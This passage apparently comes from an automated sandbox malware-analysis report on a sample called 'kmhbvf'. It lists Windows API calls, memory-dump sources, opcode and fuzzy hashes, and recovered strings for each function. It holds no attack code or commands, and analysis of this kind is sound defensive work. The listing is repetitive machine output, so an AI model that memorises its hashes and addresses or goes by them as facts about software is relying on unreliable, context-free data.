                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F27868
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00F278BB
                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F278CF
                                                                  • VariantClear.OLEAUT32(?), ref: 00F278E4
                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00F278F1
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F278FA
                                                                  • VariantClear.OLEAUT32(?), ref: 00F2790C
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F27917
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                  • String ID:
                                                                  • API String ID: 2706829360-0
                                                                  • Opcode ID: 6bd329b6d52499ad448d432509f3e9a41c15cdae851d5775d9f5798525d94de5
                                                                  • Instruction ID: f16224c0ad38160d09b9424b932b8c12173873454f7f18494f10b74a3f4c6d78
                                                                  • Opcode Fuzzy Hash: 6bd329b6d52499ad448d432509f3e9a41c15cdae851d5775d9f5798525d94de5
                                                                  • Instruction Fuzzy Hash: 52417135A0021D9FCB10EFA8DC489EEBBB9FF08310F108469E955A7261CB75A945DF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
                                                                    • Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC
                                                                  • CoInitialize.OLE32 ref: 00F48AED
                                                                  • CoUninitialize.OLE32 ref: 00F48AF8
                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00F63BBC,?), ref: 00F48B58
                                                                  • IIDFromString.OLE32(?,?), ref: 00F48BCB
                                                                  • VariantInit.OLEAUT32(?), ref: 00F48C65
                                                                  • VariantClear.OLEAUT32(?), ref: 00F48CC6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                  • API String ID: 834269672-1287834457
                                                                  • Opcode ID: 7e70b63b34937bc68d32af0f1dd9dfef07709c7346412c2729fd8ec71e29b113
                                                                  • Instruction ID: 63608855f38dcddf3a0a7af1554c94fffd4610d88cbbe1e676da8a304ad1a0d4
                                                                  • Opcode Fuzzy Hash: 7e70b63b34937bc68d32af0f1dd9dfef07709c7346412c2729fd8ec71e29b113
                                                                  • Instruction Fuzzy Hash: 58619F716087119FC710DF24C889F6EBBE4EF84794F100849F981AB291CB74ED46EBA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00F45E7E
                                                                  • inet_addr.WSOCK32(?,?,?), ref: 00F45EC3
                                                                  • gethostbyname.WSOCK32(?), ref: 00F45ECF
                                                                  • IcmpCreateFile.IPHLPAPI ref: 00F45EDD
                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F45F4D
                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F45F63
                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F45FD8
                                                                  • WSACleanup.WSOCK32 ref: 00F45FDE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                  • String ID: Ping
                                                                  • API String ID: 1028309954-2246546115
                                                                  • Opcode ID: 6dcbca8ab9c1a11702821609702e7bc6466f26086f5523f40dc51063ba514a53
                                                                  • Instruction ID: 41d8fb836f8c1e037b3e3a5c5f293cb4e53fa156cc2074460b58973b04b30bd6
                                                                  • Opcode Fuzzy Hash: 6dcbca8ab9c1a11702821609702e7bc6466f26086f5523f40dc51063ba514a53
                                                                  • Instruction Fuzzy Hash: CE5181716046019FD721EF25CC45B2ABBE4EF48B20F144969F965EB2A2DB70ED04EB42
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00F3BB13
                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F3BB89
                                                                  • GetLastError.KERNEL32 ref: 00F3BB93
                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00F3BC00
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                  • API String ID: 4194297153-14809454
                                                                  • Opcode ID: dc1732df844d5f7301da2d42b1b769fe0d319862169a9d21969d53edf3c58aed
                                                                  • Instruction ID: 9ca2b9c0a4d52b7edceade0b560b257f82356bf972c892d3d4142e9b8ce4cf13
                                                                  • Opcode Fuzzy Hash: dc1732df844d5f7301da2d42b1b769fe0d319862169a9d21969d53edf3c58aed
                                                                  • Instruction Fuzzy Hash: 2831C635A0020D9FCB10EF64CC65EAEF7B8EF84320F14816AE906E7295DF709942EB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                    • Part of subcall function 00F2B79A: GetClassNameW.USER32 ref: 00F2B7BD
                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F29BCC
                                                                  • GetDlgCtrlID.USER32 ref: 00F29BD7
                                                                  • GetParent.USER32 ref: 00F29BF3
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F29BF6
                                                                  • GetDlgCtrlID.USER32 ref: 00F29BFF
                                                                  • GetParent.USER32(?), ref: 00F29C1B
                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F29C1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1536045017-1403004172
                                                                  • Opcode ID: 47b983834cc939bcd0dcf3c3f49e4d1deb10a965f4705b2527d4448bb242f24c
                                                                  • Instruction ID: e41f69288ccc1e258ad8ef2c3feb63dd22174167049aed6305cccd6113fb7e2a
                                                                  • Opcode Fuzzy Hash: 47b983834cc939bcd0dcf3c3f49e4d1deb10a965f4705b2527d4448bb242f24c
                                                                  • Instruction Fuzzy Hash: 4121F170D00118ABDF04AB61DC95EFEBBB8EF95310F200156F971A72A1EBB58954AB20
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                    • Part of subcall function 00F2B79A: GetClassNameW.USER32 ref: 00F2B7BD
                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F29CB5
                                                                  • GetDlgCtrlID.USER32 ref: 00F29CC0
                                                                  • GetParent.USER32 ref: 00F29CDC
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F29CDF
                                                                  • GetDlgCtrlID.USER32 ref: 00F29CE8
                                                                  • GetParent.USER32(?), ref: 00F29D04
                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F29D07
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1536045017-1403004172
                                                                  • Opcode ID: e228e7e10e429ee1d2d037b7ff61bb7aba5945647ee14d41cce40bc1a9419919
                                                                  • Instruction ID: 5e943c4677816f20ded02ed05796c79c03861cb18af8e4d16bcbca16f4345db1
                                                                  • Opcode Fuzzy Hash: e228e7e10e429ee1d2d037b7ff61bb7aba5945647ee14d41cce40bc1a9419919
                                                                  • Instruction Fuzzy Hash: 8321F575D40119BFDF00AB61DC85EFEBBB9EF94300F200051F961A71A1DBB58954EB20
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetParent.USER32 ref: 00F29D27
                                                                  • GetClassNameW.USER32 ref: 00F29D3C
                                                                  • _wcscmp.LIBCMT ref: 00F29D4E
                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F29DC9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                  • API String ID: 1704125052-3381328864
                                                                  • Opcode ID: 7379ea85c74a6b97adbd779af2e436ae26aca12ec332073891dce57ee1d1d145
                                                                  • Instruction ID: 82f53c84c74972415210010fe3883186061788626534266ec83d081b7f3e8ef2
                                                                  • Opcode Fuzzy Hash: 7379ea85c74a6b97adbd779af2e436ae26aca12ec332073891dce57ee1d1d145
                                                                  • Instruction Fuzzy Hash: C211E77764D32ABAF6102620FC06DE7739CDB05320F601017FA10A60D1FED6A9517675
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 00F48FC1
                                                                  • CoInitialize.OLE32(00000000), ref: 00F48FEE
                                                                  • CoUninitialize.OLE32 ref: 00F48FF8
                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00F490F8
                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F49225
                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F63BDC), ref: 00F49259
                                                                  • CoGetObject.OLE32(?,00000000,00F63BDC,?), ref: 00F4927C
                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00F4928F
                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F4930F
                                                                  • VariantClear.OLEAUT32(?), ref: 00F4931F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                  • String ID:
                                                                  • API String ID: 2395222682-0
                                                                  • Opcode ID: 4e11409eeab6182daa8ec24b73d02398c005d99b9519d937a1ed067695c0ab3b
                                                                  • Instruction ID: 88d378fcd8c8ea3fb54a56c24ab21daa5ff1bcd23891df723901da895b7443ef
                                                                  • Opcode Fuzzy Hash: 4e11409eeab6182daa8ec24b73d02398c005d99b9519d937a1ed067695c0ab3b
                                                                  • Instruction Fuzzy Hash: 66C14571608305AFD700DF68C88492BBBE9FF89348F10491DF98A9B251DBB1ED06DB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00F319EF
                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F30A67,?,00000001), ref: 00F31A03
                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00F31A0A
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F30A67,?,00000001), ref: 00F31A19
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F31A2B
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F30A67,?,00000001), ref: 00F31A44
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F30A67,?,00000001), ref: 00F31A56
                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F30A67,?,00000001), ref: 00F31A9B
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F30A67,?,00000001), ref: 00F31AB0
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F30A67,?,00000001), ref: 00F31ABB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                  • String ID:
                                                                  • API String ID: 2156557900-0
                                                                  • Opcode ID: a712d29fc51a113b7b37fdfc218f29422e8dbb21083123945fb31296da7dc5d8
                                                                  • Instruction ID: 0ec95abab49f283ecc126f669fcc6e0679fb19b22cd7979b235af8025ef04d37
                                                                  • Opcode Fuzzy Hash: a712d29fc51a113b7b37fdfc218f29422e8dbb21083123945fb31296da7dc5d8
                                                                  • Instruction Fuzzy Hash: 26318F71912208AFDF209F54DC44B6A77AABB5637AF208116FD00C6290DBB99D40BF60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                  • String ID:
                                                                  • API String ID: 1737998785-0
                                                                  • Opcode ID: 79b6f8930cc60e1a2c53aa17b9dc3944cabfef226b5fb97c392dc1e100834f15
                                                                  • Instruction ID: 1ce3d0985ab5620f634abc2c551e9e78e1d51da78b1cf4d5ceddcd446f46ec10
                                                                  • Opcode Fuzzy Hash: 79b6f8930cc60e1a2c53aa17b9dc3944cabfef226b5fb97c392dc1e100834f15
                                                                  • Instruction Fuzzy Hash: BC21C731601214AFDB01AF20EC09F2E7BB9EF44721F108019F916AB3A1CFB5AD11EB54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetSysColor.USER32(00000008), ref: 00ED260D
                                                                  • SetTextColor.GDI32(?,000000FF), ref: 00ED2617
                                                                  • SetBkMode.GDI32(?,00000001), ref: 00ED262C
                                                                  • GetStockObject.GDI32(00000005), ref: 00ED2634
                                                                  • GetClientRect.USER32(?), ref: 00F0C0FC
                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F0C113
                                                                  • GetWindowDC.USER32(?), ref: 00F0C11F
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00F0C12E
                                                                  • ReleaseDC.USER32 ref: 00F0C140
                                                                  • GetSysColor.USER32(00000005), ref: 00F0C15E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                  • String ID:
                                                                  • API String ID: 3430376129-0
                                                                  • Opcode ID: 72e2edfb500b5723258824dd984eab8100e737b55d6de856fd842fac3bce7a38
                                                                  • Instruction ID: 6bba524e1dd48f74fa30adbd7253d411f578e3f5bba59694a13f00192f572bee
                                                                  • Opcode Fuzzy Hash: 72e2edfb500b5723258824dd984eab8100e737b55d6de856fd842fac3bce7a38
                                                                  • Instruction Fuzzy Hash: 29114C31500209BFDB615FA4EC08BEA7BA1EB19321F244265FA76951E1CFB20951FF51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EDADE1
                                                                  • OleUninitialize.OLE32(?,00000000), ref: 00EDAE80
                                                                  • UnregisterHotKey.USER32(?), ref: 00EDAFD7
                                                                  • DestroyWindow.USER32(?), ref: 00F12F64
                                                                  • FreeLibrary.KERNEL32(?), ref: 00F12FC9
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F12FF6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                  • String ID: close all
                                                                  • API String ID: 469580280-3243417748
                                                                  • Opcode ID: 5c736c3f9f630cd003f1d7e4f25ea8d5a3f764adbd4d99a34dcfb59402babd4a
                                                                  • Instruction ID: d10b77adce27780817997d9e004a6858649fc6cf3d743c934c82894adc0c6f21
                                                                  • Opcode Fuzzy Hash: 5c736c3f9f630cd003f1d7e4f25ea8d5a3f764adbd4d99a34dcfb59402babd4a
                                                                  • Instruction Fuzzy Hash: C6A16C707012128FCB29EF54C895AA9F3A4FF04714F1452ADE80ABB252DB31AE52DF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ChildEnumWindows
                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                  • API String ID: 3555792229-1603158881
                                                                  • Opcode ID: fba1b2b662fffc15bed65d22e00962984de68c1d98807685f6a18a2f495ef58d
                                                                  • Instruction ID: e08632d060efdc7dde0ed834610a1ef0aeb4d8130a2be9210a41105f1849bc5b
                                                                  • Opcode Fuzzy Hash: fba1b2b662fffc15bed65d22e00962984de68c1d98807685f6a18a2f495ef58d
                                                                  • Instruction Fuzzy Hash: C891E571900619EBDB18EF70D481BEEFBB4FF04310F108119E96AA7192DF346999EB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetWindowLongW.USER32 ref: 00ED327E
                                                                    • Part of subcall function 00ED218F: GetClientRect.USER32(?,?), ref: 00ED21B8
                                                                    • Part of subcall function 00ED218F: GetWindowRect.USER32 ref: 00ED21F9
                                                                    • Part of subcall function 00ED218F: ScreenToClient.USER32 ref: 00ED2221
                                                                  • GetDC.USER32 ref: 00F0D073
                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F0D086
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00F0D094
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00F0D0A9
                                                                  • ReleaseDC.USER32 ref: 00F0D0B1
                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F0D13C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                  • String ID: U
                                                                  • API String ID: 4009187628-3372436214
                                                                  • Opcode ID: 7cf264a2f45ea129748a683bcbd45be592be4631ceb1b7168ce98474f449ed2e
                                                                  • Instruction ID: f58b645b719ec8312b7668e110e63f1034b36dbfb8941fb78a027d21af113853
                                                                  • Opcode Fuzzy Hash: 7cf264a2f45ea129748a683bcbd45be592be4631ceb1b7168ce98474f449ed2e
